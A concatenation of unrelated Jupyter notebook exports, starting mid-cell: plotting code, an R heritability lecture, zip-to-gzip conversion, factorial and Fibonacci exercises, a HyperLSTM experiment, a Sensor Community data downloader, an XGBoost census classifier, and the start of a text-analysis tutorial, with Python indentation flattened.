ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
###Output
_____no_output_____ |
gwas-lecture-master/Lecture-6-BroadSenseHeritability.ipynb | ###Markdown
Estimating broad-sense Heritability ($H^{2}$) Heritability is the proportion of phenotypic variance that can be attributed to genetic differences among individuals. It is defined as the ratio of genetic to total phenotypic variation in a population:Phenotype (P) = Genotype (G) + Environment (E)The genetic component of phenotypic variance can be separated into additive, dominance, and interaction (G x G) effects. Each of these components of variance contribute to broad-sense heritability:\begin{equation*}H^{2} = \frac{VG}{VP} \end{equation*}or\begin{equation*}H^{2} = \frac{Va + Vd + Vi}{VP} \end{equation*}There are several ways to estimate broad-sense heritability. For those of us that work on inbred lines, we can model the variance due to genetics and the environment using a mixed-effects model, while including the accession-id (also known as the genotype or ecotype in some fields of research) as a random effect. We can then use a trick described in [this paper](https://besjournals.onlinelibrary.wiley.com/doi/10.1111/j.2041-210x.2012.00261.x) and implemented in code described [here](https://jonlefcheck.net/2013/03/13/r2-for-linear-mixed-effects-models/). *** Load the data To investigate broad-sense heritability, let's use [publicly available](http://www.pnas.org/content/112/13/4032) glucosinolate data. The formatted data can be downloaded here:curl https://raw.githubusercontent.com/timeu/gwas-lecture/master/data/cmeyer_glucs2015/bmeyer_etal.txt --create-dirs --output data/cmeyer_glucs2015/bmeyer_etal.txtThis is the R-script for estimating marginal and conditional variance in a mixed-model (merMod):curl https://raw.githubusercontent.com/timeu/gwas-lecture/master/data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R --create-dirs --output data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R
###Code
## if lme4 isn't installed, install it first:
if (!require("lme4")) install.packages("lme4");
library(lme4);
source("data/cmeyer_glucs2015/hdr.estimate_r2_mixedmodels.R");
glucosinolateFileName <- "data/cmeyer_glucs2015/bmeyer_etal.txt";
glucs <- read.table(glucosinolateFileName, header=T, sep="\t", as.is=T, stringsAsFactors=FALSE);
glucs <- glucs[order(glucs[,"accession_id"]),];
dim(glucs);
head(glucs);
str(glucs);
## note that accession_id isn't a factor yet...
## it is numeric, so it is important to be explicit...
glucs$accession_id <- as.factor(glucs$accession_id);
## adjust the ion counts by sample weight
for( j in 3:ncol(glucs)){
glucosinolateVariableName <- colnames(glucs)[j];
glucs[[paste0(glucosinolateVariableName, "_per_mg")]] <- glucs[,glucosinolateVariableName] / glucs[,"sample_weight"]; ## in mg
}
## there are 22 glucosinolate phenotypes, let's look at their distributions
options(repr.plot.width=5, repr.plot.height=4)
scaledGlucosinolates <- colnames(glucs)[grep("per_mg$", colnames(glucs))];
for( col_j in scaledGlucosinolates ){
scaledGluc_j <- glucs[,col_j];
hist(scaledGluc_j, breaks=100, col="cadetblue3", main=col_j, xlab=paste0("Ion counts, ", col_j));
}
###Output
_____no_output_____
###Markdown
There's a surprising amount of zero-inflation in the data. To analyze data such as these, one can choose between (a) a zero-inflated model, (b) logistic regression (focusing on presence/absence of each metabolite), (c) attempting to standardize the data and analyze it using traditional linear approaches (not recommended but the most common approach; linear models are very robust), (d) analyzing the data as presence/absence data and, separately, abundance data before combining the results using Brown's _P_ value or a weighted Z-score approach. Let's use linear models to investigate the data, which is what the authors did
###Code
results <- data.frame(method=character(), glucosinolate_name=character(), H2=numeric(), pvalue=numeric(), stringsAsFactors=FALSE);
scaledGlucosinolates <- colnames(glucs)[grep("per_mg$", colnames(glucs))]; print(scaledGlucosinolates);
for( col_j in scaledGlucosinolates ){
cat("Investigating:", col_j, "\n");
log_of_y <- log(glucs[,col_j] + 0.01); ## add an offset to avoid 0s which return -Inf
lm.null <- lm(log_of_y ~ 1, data=glucs);
lmer.alt <- lmer(log_of_y ~ 1 + (1|accession_id), data=glucs, REML=FALSE);
results[nrow(results) + 1, "method"] <- "linear";
results[nrow(results), "glucosinolate_name"] <- col_j;
ourEstimate <- r.squared.merMod(lmer.alt);
results[nrow(results), "H2"] <- ourEstimate['Conditional'] - ourEstimate['Marginal'];
## note that the mixed model has to be specified first
## if sigma is on the boundary, this approach is conservative; consider exactLRT which estimates the p-value using simulations.
## source: https://bbolker.github.io/mixedmodels-misc/glmmFAQ.html
results[nrow(results), "pvalue"] <- anova(lmer.alt, lm.null)[2, "Pr(>Chisq)"];
}
results;
title <- paste0("Heritability of glucosinolates");
hist(results[,"H2"], breaks=25, col="red", main=title, xlab=expression(paste("H"^"2")))
###Output
_____no_output_____ |
Changing_compression.ipynb | ###Markdown
Importing Libraries
###Code
from zipfile import ZipFile
import os
import re
import gzip
###Output
_____no_output_____
###Markdown
finding files with zip extensions in './data/' directory
###Code
data_folder = "./data/"
# Loading the list of file in './data/' directory
pattern = r'(.*)\.zip'
files_n = [[par_n+"/",re.match(pattern, file)[1]] for par_n, dir_n, file_n in os.walk(data_folder)
for file in file_n if re.match(pattern, file)!=None]
# Changing the compression to gzip
for path, file in files_n:
# Extracting the zip file
with ZipFile(path+file+'.zip', 'r') as zipf:
zipf.extractall(path)
# Compressing the extracted text file using gzip compression
with open(path+file+'.txt', 'rb') as f_in, gzip.open(path+file+'.txt.gz', 'wb') as f_out:
f_out.writelines(f_in)
# Removing the extracted text file
os.remove(path+file+'.txt')
###Output
_____no_output_____
###Markdown
Uploading gzipped files
###Code
# For uploading the gzipped files, run the following in command line
# (assuming all the gzip files are directly inside ./data/ directory on your local machine)
gsutil -m cp -r /data/*.gz gs://my-bucket/directory
###Output
_____no_output_____ |
unit1/fibonacci.ipynb | ###Markdown
Task: создать функцию, которая возвращает n первых факториалов fact(4) [1, 1, 2, 6, 24] i.e. [0!, 1!, 2!, 3!, 4!]
###Code
import unittest
class TestFact(unittest.TestCase):
"""test factorial functions"""
def test1(self):
self.assertEqual(fact(0), [1])
self.assertEqual(fact(1), [1, 1])
self.assertEqual(fact(2), [1, 1, 2])
self.assertEqual(fact(3), [1, 1, 2, 6])
self.assertEqual(fact(5), [1, 1, 2, 6, 24, 120])
def fact(n):
res = []
return res
a=[4,8,9,0]
a[2]
res = [1]
n = 7
for i in range(1, n):
t = i*res[i-1]
res.append(t)
res
def fact(n):
res = [1]
for i in range(1, n):
t = i*res[i-1]
res.append(t)
return res
fact(5)
###Output
_____no_output_____
###Markdown
Task: создать функцию, которая возвращает n первых членов последовальности Fibonacci fib(7) [0, 1, 1, 2, 3, 5, 8, 13]
###Code
def fib(n):
res = [0, 1]
return res
import unittest
class TestFib(unittest.TestCase):
"""test factorial functions"""
def test1(self):
self.assertEqual(fib(2), [0, 1])
self.assertEqual(fib(4), [0, 1, 1, 2])
self.assertEqual(fib(8), [0, 1, 1, 2, 3, 5, 8, 13])
if __name__ == '__main__':
unittest.main(argv=['first-arg-is-ignored'], exit=False)
res = [0,1]
n = 7
for i in range(1, n):
# t = res[i-1]
t = res[i]+res[i-1]
res.append(t)
res
def fib(n):
res = [0,1]
for i in range(1, n -1):
t = res[i]+res[i-1]
res.append(t)
return res
fib(10)
t = 1
i = 1
n = 13
while i <= n:
t = i*t
# print(i,t)
i = i+1
def fact2(n):
i = 1
t = 1
while i <= n:
t = i*t
# print(i,t)
i = i+1
return t
fact2(15)
assert fact2(1) == 1
assert fact2(2) == 2
assert fact2(3) == 6
n = int(input("number"))
fact2(n)
def fact_user():
s = input("number?")
n = int(s)
res = fact2(n)
return res
fact_user()
t = 1
i = 1
while t <= 1e9:
t = i*t
print(i,t)
i = i+1
ss = " AAABBBBCCCCCC"
len(ss)
"E" in ss
ss.count("S")
fact2(len(ss))/(fact2(ss.count("A")) * fact2(ss.count("B")) * fact2(ss.count("C")))
###Output
_____no_output_____ |
labml_nn/hypernetworks/experiment.ipynb | ###Markdown
[](https://github.com/labmlai/annotated_deep_learning_paper_implementations)[](https://colab.research.google.com/github/labmlai/annotated_deep_learning_paper_implementations/blob/master/labml_nn/hypernetworks/experiment.ipynb) HyperLSTMThis is an experiment training Shakespear dataset with HyperLSTM from paper HyperNetworks.
###Code
!pip install labml-nn
from labml import experiment
from labml_nn.hypernetworks.experiment import Configs
# Create experiment
experiment.create(name="hyper_lstm", comment='')
# Create configs
conf = Configs()
# Load configurations
experiment.configs(conf,
# A dictionary of configurations to override
{'tokenizer': 'character',
'text': 'tiny_shakespeare',
'optimizer.learning_rate': 2.5e-4,
'optimizer.optimizer': 'Adam',
'prompt': 'It is',
'prompt_separator': '',
'rnn_model': 'hyper_lstm',
'train_loader': 'shuffled_train_loader',
'valid_loader': 'shuffled_valid_loader',
'seq_len': 512,
'epochs': 128,
'batch_size': 2,
'inner_iterations': 25})
# Set models for saving and loading
experiment.add_pytorch_models({'model': conf.model})
conf.init()
# Start the experiment
with experiment.start():
# `TrainValidConfigs.run`
conf.run()
###Output
_____no_output_____
###Markdown
[](https://github.com/lab-ml/nn)[](https://colab.research.google.com/github/lab-ml/nn/blob/master/labml_nn/hypernetworks/experiment.ipynb) HyperLSTMThis is an experiment training Shakespear dataset with HyperLSTM from paper HyperNetworks.
###Code
!pip install labml-nn
from labml import experiment
from labml_nn.hypernetworks.experiment import Configs
# Create experiment
experiment.create(name="hyper_lstm", comment='')
# Create configs
conf = Configs()
# Load configurations
experiment.configs(conf,
# A dictionary of configurations to override
{'tokenizer': 'character',
'text': 'tiny_shakespeare',
'optimizer.learning_rate': 2.5e-4,
'optimizer.optimizer': 'Adam',
'prompt': 'It is',
'prompt_separator': '',
'rnn_model': 'hyper_lstm',
'train_loader': 'shuffled_train_loader',
'valid_loader': 'shuffled_valid_loader',
'seq_len': 512,
'epochs': 128,
'batch_size': 2,
'inner_iterations': 25})
# Set models for saving and loading
experiment.add_pytorch_models({'model': conf.model})
conf.init()
# Start the experiment
with experiment.start():
# `TrainValidConfigs.run`
conf.run()
###Output
_____no_output_____ |
notebooks/download_sensor_community.ipynb | ###Markdown
Automated .csv downloadAutomated download of sensor data from [Sensor Community Archive](https://archive.sensor.community/csv_per_month/).Define `MONTH_START`, `MONTH_COUNT` and `SENSORS` for specifying the files that should be downloaded.Define `WAIT_BETWEEN_DOWNLOADS` to define the waiting time between in minutes one download started and the net begins. A random number between the two defined will be used.Define `LAT_RANGE` and `LON_RANGE` for geographical regions of interest.
###Code
import requests
from bs4 import BeautifulSoup as bs
import time
import os
import zipfile
import numpy as np
import pandas as pd
MONTH_START = "2020-01" # Start month in the format yyyy-mm
MONTH_COUNT = 1 # sensor data will be downloaded for this amount of months
URL = "https://archive.sensor.community/csv_per_month/"
ROOT_DIR = os.path.join(os.curdir, "../data", "")
WAIT_BETWEEN_DOWNLOADS = (0, 1)
SENSORS = [
'bme280',
# 'bmp180',
'bmp280',
'dht22',
# 'ds18b20',
# 'hpm',
# 'htu21d',
# 'pms1003',
# 'pms3003',
# 'pms5003',
# 'pms6003',
# 'pms7003',
# 'ppd42ns',
'sds011',
]
LAT_RANGE = [
(53.013, 53.1456),
(50.030681, 50.205692),
]
# Bremen: (53.013, 53.1456)
# Frankfurt a. M.: (50.030681, 50.205692)
LON_RANGE = [
(8.67, 8.9334),
(8.430634, 8.919868),
]
# Bremen: (8.67, 8.9334)
# Frankfurt a. M.: (8.430634, 8.919868)
def write_to_log(log_file, *args):
"""writes text to the defined log file
Args:
log_file: path to the log file
*args: one or more strings that are written to the log file
"""
with open(log_file, 'a') as log:
for text in args:
log.write(text)
script_start = time.time()
# make log file if it doesn't exist
date = time.strftime('%Y_%m_%d')
log_file_name = date + "_download_log.txt"
log_file_dir = os.path.join(ROOT_DIR + log_file_name)
print(log_file_dir)
if not os.path.exists(ROOT_DIR):
os.mkdir(ROOT_DIR)
if os.path.isfile(log_file_dir):
print('log file already exists.')
print('New entries will be appended.')
else:
log = open(log_file_dir, "w")
log.close()
write_to_log(log_file_dir, "Session started at " + time.strftime('%Y_%m_%d-%H_%M_%S') + '\n')
# make list of relevant months
month_current = MONTH_START
months = [MONTH_START]
for month in range(MONTH_COUNT-1):
y, m = month_current.split('-')
if m == '12':
m = '01'
y = str(int(y) + 1)
elif int(m) < 9:
m = '0' + str(int(m) + 1)
else:
m = str(int(m) + 1)
month_current = y + '-' + m
months.append(month_current)
write_to_log(log_file_dir, f"Months: {months}\n")
# get download links for relevant months and sensors
for month in months:
# get url
url_curr = URL + month + '/'
print(url_curr)
write_to_log(log_file_dir, f"URL: {url_curr}\n")
# find download links according to the sensors list and save them with file names
r = requests.get(url_curr)
soup = bs(r.text)
urls = []
names = []
for i, link in enumerate(soup.findAll('a')):
if '.zip' in str(link) and any([sensor in str(link) for sensor in SENSORS]):
url_download = url_curr + link.get('href')
urls.append(url_download)
names.append(soup.select('a')[i].attrs['href'])
print("Files to download:")
for file_name in names:
print(file_name)
write_to_log(log_file_dir, f"\tFiles: {names}\n")
names_urls = zip(names, urls)
# download files
files_finished = 0
for name, url in names_urls:
# define path where downloaded file will be saved
category = name.split('.')[0].split('_')[-1]
# directory = os.path.join(ROOT_DIR, category, "")
directory = ROOT_DIR
full_path = os.path.join(directory, name)
if not os.path.exists(directory):
os.mkdir(directory)
# define path for processed .csv file
processed_dir = os.path.join(ROOT_DIR, "SensorCommunity", "")
if not os.path.exists(processed_dir):
os.mkdir(processed_dir)
name_csv = name.split('.')[0] + ".csv"
csv_processed_dir = os.path.join(processed_dir, name_csv)
# get path of unprocessed .csv file
csv_full = os.path.join(directory, name_csv)
# if the processed .csv file already exists skip download
if os.path.isfile(csv_processed_dir) or os.path.isfile(csv_full) or os.path.isfile(full_path):
if os.path.isfile(csv_processed_dir):
write_to_log(log_file_dir, \
f"\t\t{csv_processed_dir} already exists... download and processing {name} gets skipped.\n")
continue
elif os.path.isfile(csv_full):
write_to_log(log_file_dir, \
f"\t\t{csv_full} already exists... download of {name} gets skipped.\n")
elif os.path.isfile(full_path):
write_to_log(log_file_dir, \
f"\t\t{full_path} already exists... download of {name} gets skipped.\n")
# download .zip file if it doesn't exist yet
if not os.path.isfile(csv_full) and not os.path.isfile(full_path):
print(f"Start downloading {name}.")
start = time.time()
response = requests.get(url, timeout=50)
with open(full_path, 'wb') as f:
f.write(response.content)
end = time.time()
print(f"The download took {round((end - start) / 60, 1)} minutes.")
write_to_log(log_file_dir, \
f"\t\t{name}\n", \
f"\t\t\tDownload successfully finished after {(end - start) / 60} minutes.\n")
if os.path.isfile(full_path):
# unzip file
print("Unzip file...")
with zipfile.ZipFile(full_path, 'r') as zip_ref:
zip_ref.extractall(directory)
print("Unzipping finished")
write_to_log(log_file_dir, f"\t\t\t{name} unzipped\n")
# delete .zip
os.remove(full_path)
print(".zip file deleted")
write_to_log(log_file_dir, f"\t\t\t.zip file deleted\n")
# define the chunk size that is read from .csv
chunksize = 10 ** 6
# read .csv chunkwise
with pd.read_csv(csv_full, sep=";", chunksize=chunksize) as reader:
write_to_log(log_file_dir, f"\t\t\tprocessing {csv_full}\n")
print(f"processing {csv_full}\n")
for i, chunk in enumerate(reader):
# filter data by desired longitude and latitude
for j, lat in enumerate(LAT_RANGE):
df_temp = chunk[(chunk['lat'] > LAT_RANGE[j][0]) & \
(chunk['lat'] < LAT_RANGE[j][1]) & \
(chunk['lon'] > LON_RANGE[j][0]) & \
(chunk['lon'] < LON_RANGE[j][1])]
# make a new file for the first chunk and append the subsequent chunks
if not i and not j:
df_temp.to_csv(csv_processed_dir, header=True, index=False)
else:
df_temp.to_csv(csv_processed_dir, mode='a', header=False, index=False)
write_to_log(log_file_dir, f"\t\t\t\twrote chunk #{i} for region #{j}\n")
#delete original .csv file
os.remove(csv_full)
write_to_log(log_file_dir, f"\t\t\t\t{csv_full} deleted\n")
print(f"{csv_full} deleted")
# wait before next download starts
wait = np.random.randint(WAIT_BETWEEN_DOWNLOADS[0], WAIT_BETWEEN_DOWNLOADS[1])
print(f"Wait for {wait} minutes")
write_to_log(log_file_dir, f"\t\t\twait for {wait} minutes\n\n")
time.sleep(wait * 60)
print()
script_end = time.time()
print(f"Finished script after {round((script_end - script_start) / 60, 1)} minutes")
write_to_log(log_file_dir, f"Finished script after {round((script_end - script_start) / 60, 1)} minutes\n\n")
###Output
_____no_output_____ |
AppModel.ipynb | ###Markdown
###Code
!pip install eli5
!pip install xgboost
!pip install category_encoders
!pip install shap
###Output
Requirement already satisfied: eli5 in /usr/local/lib/python3.6/dist-packages (0.10.1)
Requirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from eli5) (1.15.0)
Requirement already satisfied: scikit-learn>=0.18 in /usr/local/lib/python3.6/dist-packages (from eli5) (0.22.2.post1)
Requirement already satisfied: attrs>16.0.0 in /usr/local/lib/python3.6/dist-packages (from eli5) (20.2.0)
Requirement already satisfied: graphviz in /usr/local/lib/python3.6/dist-packages (from eli5) (0.10.1)
Requirement already satisfied: tabulate>=0.7.7 in /usr/local/lib/python3.6/dist-packages (from eli5) (0.8.7)
Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from eli5) (1.4.1)
Requirement already satisfied: numpy>=1.9.0 in /usr/local/lib/python3.6/dist-packages (from eli5) (1.18.5)
Requirement already satisfied: jinja2 in /usr/local/lib/python3.6/dist-packages (from eli5) (2.11.2)
Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn>=0.18->eli5) (0.16.0)
Requirement already satisfied: MarkupSafe>=0.23 in /usr/local/lib/python3.6/dist-packages (from jinja2->eli5) (1.1.1)
Requirement already satisfied: xgboost in /usr/local/lib/python3.6/dist-packages (0.90)
Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from xgboost) (1.4.1)
Requirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from xgboost) (1.18.5)
Requirement already satisfied: category_encoders in /usr/local/lib/python3.6/dist-packages (2.2.2)
Requirement already satisfied: statsmodels>=0.9.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.10.2)
Requirement already satisfied: scipy>=1.0.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.4.1)
Requirement already satisfied: pandas>=0.21.1 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.1.2)
Requirement already satisfied: patsy>=0.5.1 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.5.1)
Requirement already satisfied: numpy>=1.14.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (1.18.5)
Requirement already satisfied: scikit-learn>=0.20.0 in /usr/local/lib/python3.6/dist-packages (from category_encoders) (0.22.2.post1)
Requirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.21.1->category_encoders) (2.8.1)
Requirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.21.1->category_encoders) (2018.9)
Requirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from patsy>=0.5.1->category_encoders) (1.15.0)
Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn>=0.20.0->category_encoders) (0.16.0)
Collecting shap
[?25l Downloading https://files.pythonhosted.org/packages/d2/17/37ee6c79cafbd9bb7423b54e55ea90beec66aa7638664d607bcc28de0bae/shap-0.36.0.tar.gz (319kB)
[K |████████████████████████████████| 327kB 5.5MB/s
[?25hRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from shap) (1.18.5)
Requirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from shap) (1.4.1)
Requirement already satisfied: scikit-learn in /usr/local/lib/python3.6/dist-packages (from shap) (0.22.2.post1)
Requirement already satisfied: pandas in /usr/local/lib/python3.6/dist-packages (from shap) (1.1.2)
Requirement already satisfied: tqdm>4.25.0 in /usr/local/lib/python3.6/dist-packages (from shap) (4.41.1)
Collecting slicer
Downloading https://files.pythonhosted.org/packages/46/cf/f37ac7f61214ed044b0df91252ab19376de5587926c5b572f060eb7bf257/slicer-0.0.4-py3-none-any.whl
Requirement already satisfied: numba in /usr/local/lib/python3.6/dist-packages (from shap) (0.48.0)
Requirement already satisfied: joblib>=0.11 in /usr/local/lib/python3.6/dist-packages (from scikit-learn->shap) (0.16.0)
Requirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.6/dist-packages (from pandas->shap) (2.8.1)
Requirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas->shap) (2018.9)
Requirement already satisfied: setuptools in /usr/local/lib/python3.6/dist-packages (from numba->shap) (50.3.0)
Requirement already satisfied: llvmlite<0.32.0,>=0.31.0dev0 in /usr/local/lib/python3.6/dist-packages (from numba->shap) (0.31.0)
Requirement already satisfied: six>=1.5 in /usr/local/lib/python3.6/dist-packages (from python-dateutil>=2.7.3->pandas->shap) (1.15.0)
Building wheels for collected packages: shap
Building wheel for shap (setup.py) ... [?25l[?25hdone
Created wheel for shap: filename=shap-0.36.0-cp36-cp36m-linux_x86_64.whl size=456467 sha256=a5869ed98d3fe9b30fc0873d73389f9de87c0bde8717a1d76b9f0d9158992d09
Stored in directory: /root/.cache/pip/wheels/fb/15/e1/8f61106790da27e0765aaa6e664550ca2c50ea339099e799f4
Successfully built shap
Installing collected packages: slicer, shap
Successfully installed shap-0.36.0 slicer-0.0.4
###Markdown
Import of Libraries needed
###Code
import pandas as pd
import numpy as np
import shap
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.ensemble import RandomForestClassifier
from sklearn.impute import SimpleImputer
from category_encoders import OrdinalEncoder
from xgboost import XGBClassifier
from sklearn.inspection import permutation_importance
from sklearn.model_selection import RandomizedSearchCV, GridSearchCV
from sklearn.metrics import classification_report, plot_confusion_matrix, plot_roc_curve
import matplotlib.pyplot as plt
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import cross_val_score
###Output
_____no_output_____
###Markdown
Import Datasets
###Code
census = pd.read_csv('https://raw.githubusercontent.com/VPDeb/DS-Unit-2-Applied-Modeling/master/Build%20Week%20Project/census.csv')
###Output
_____no_output_____
###Markdown
Begin EDA
###Code
#Time to make the 'missing' values into NaN so we can work with them
census.replace({'?': np.NaN}, inplace=True)
#Printing Top Values to Fill NaNs
print('Top Value:',census['native-country'].describe())
print('Top Value:',census['occupation'].describe())
print('Top Value:',census['workclass'].describe())
#filling NaN values
census['workclass'].replace({np.NaN : 'Private'},inplace=True)
census['occupation'].replace({np.NaN : 'Prof-specialty'}, inplace=True)
census['native-country'].replace({np.NaN : 'United-States'},inplace=True)
###Output
_____no_output_____
###Markdown
Working on the wrangle function. Not sure how to get these three def/if/else functions wrapped into one working or multi working function inside of a wranglefunction🤔
###Code
#Create a New Feature that changes the income column into a 1 if they make more than 50K a year and 0 if they make 50K or less. New Feature called 'makes-50K+'.
def over50K(census):
if census['income'] == '>50K':
val = 1
else:
val = 0
return val
census['makes-50K+'] = census.apply(over50K, axis=1)
#Create a New Feature that changes the hours worked per week column into a 1 if they worked more than 40 hrs a week and 0 if they worked 40 or less. New Feature called 'over40hrs'.
def over40(census):
if census['hours-per-week'] >40:
val = 1
else:
val = 0
return val
census['over40hrs+'] = census.apply(over40, axis=1)
#Create a New Feature that changes the sex column into a 1 if they were Female and 0 if they were Male. New Feature called 'gender-F/1-M/0'. This is new Target column.
def gender(census):
if census['sex'] == 'Female':
val = 1
else:
val = 0
return val
census['gender-F/1-M/0'] = census.apply(gender, axis=1)
# Time to drop columns we don't need anylonger. Feature'fnlwgt' is high card and Unnecessary while 'sex' would now become a leaky feature and income and hours per week are now redundant
census = census.drop(columns=['fnlwgt','income','hours-per-week','sex','capital-gain','capital-loss'])
###Output
_____no_output_____
###Markdown
Splitting the Data
###Code
#Split data randomly with a 60/20/20 split
train, val, test = np.split(census.sample(frac=1), [int(.6*len(census)), int(.8*len(census))])
#Split the data into X and y for training the model and making predictions
target= 'gender-F/1-M/0'
y_train = train[target]
X_train = train.drop(target,axis=1)
y_val = val[target]
X_val = val.drop(target,axis=1)
y_test = test[target]
X_test = test.drop(target,axis=1)
###Output
_____no_output_____
###Markdown
Establishing the Baseline
###Code
print('Baseline Accuracy:', y_train.value_counts(normalize=True).max())
###Output
Baseline Accuracy: 0.6679406244668146
###Markdown
Building the Model
###Code
#Starting with a pipeline. Using OrdinalEncoder for the object columns, we do not need and Imputer since they were all filled with top values and I am working with XGBClassifier.
modelxgb = make_pipeline(
OrdinalEncoder(),
XGBClassifier(n_jobs=-1)
)
modelxgb.fit(X_train,y_train)
print('Training accuracy:', modelxgb.score(X_train, y_train))
print('Validation accuracy:', modelxgb.score(X_val, y_val))
modelxgb.fit(X_train, y_train)
# make predictions for test data
y_pred = modelxgb.predict(X_test)
# evaluate predictions
from sklearn.metrics import accuracy_score
accuracy = accuracy_score(y_test, y_pred)
print("Accuracy: %.2f%%" % (accuracy * 100.0))
%matplotlib inline
import seaborn as sns
sns.distplot(y_train);
from joblib import dump
dump(modelxgb, 'Pipeline.joblib2', compress=True)
###Output
_____no_output_____ |
curriculum/2_data_exploration_and_analysis/text-analysis/text_analysis_social_services.ipynb | ###Markdown
Text Analysis--- Introduction**Text analysis** is used to extract useful information from or summarize a large amount of unstructured text stored in documents. This opens up the opportunity of using text data alongside more conventional data sources (e.g. surveys and administrative data). The goal of text analysis is to take a large corpus of complex and unstructured text data and extract important and meaningful messages in a comprehensible way. Text analysis can help with the following tasks:* **Information Retrieval**: Find relevant information in a large database, such as a systematic literature review, that would be very time-consuming for humans to do manually. * **Clustering and Text Categorization**: Summarize a large corpus of text by finding the most important phrases, using methods like topic modeling. * **Text Summarization**: Create category-sensitive text summaries of a large corpus of text. * **Machine Translation**: Translate documents from one language to another. In this tutorial, we are going to analyze social services descriptions using topic modeling to examine the content of our data and document classification to tag the type of job in the advertisement. Learning OutcomesIn this tutorial, you will...* Learn how to transform a corpus of text into a structured matrix format so that we can apply natural language processing (NLP) methods* Learn the basics and applications of topic modeling* Learn how to do document tagging and evaluate the results Glossary of Terms* **Corpus**: A corpus is the set of all text documents used in your analysis; for example, your corpus of text may include hundreds of research articles.* **Tokenize**: Tokenization is the process by which text is separated into meaningful terms or phrases. In English this is easy to do for individual words, as they are separated by whitespace; however, it can get more complicated to automate determining which groups of words constitute meaningful phrases. * **Stemming**: Stemming is normalizing text by reducing all forms or conjugations of a word to the word's most basic form. In English, this can mean making a rule of removing the suffixes "ed" or "ing" from the end of all words, but it gets more complex. For example, "to go" is irregular, so you need to tell the algorithm that "went" and "goes" stem from a common lemma, and should be considered alternate forms of the word "go."* **TF-IDF**: TF-IDF (term frequency-inverse document frequency) is an example of feature engineering where the most important words are extracted by taking account their frequency in documents and the entire corpus of documents as a whole.* **Topic Modeling**: Topic modeling is an unsupervised learning method where groups of words that often appear together are clustered into topics. Typically, the words in one topic should be related and make sense (e.g. boat, ship, captain). Individual documents can fall under one topic or multiple topics. * **LDA**: LDA (Latent Dirichlet Allocation) is a type of probabilistic model commonly used for topic modeling. * **Stop Words**: Stop words are words that have little semantic meaning but occur very frequently, like prepositions, articles and common nouns. For example, every document (in English) will probably contain the words "and" and "the" many times. You will often remove them as part of preprocessing using a list of stop words.
###Code
%pylab inline
import nltk
import ujson
import re
import time
import progressbar
import pandas as pd
from __future__ import print_function
from six.moves import zip, range
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.decomposition import LatentDirichletAllocation
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import precision_recall_curve, roc_auc_score, auc
from sklearn import preprocessing
from collections import Counter, OrderedDict
from nltk.corpus import stopwords
from nltk import SnowballStemmer
#nltk.download('stopwords') #download the latest stopwords
###Output
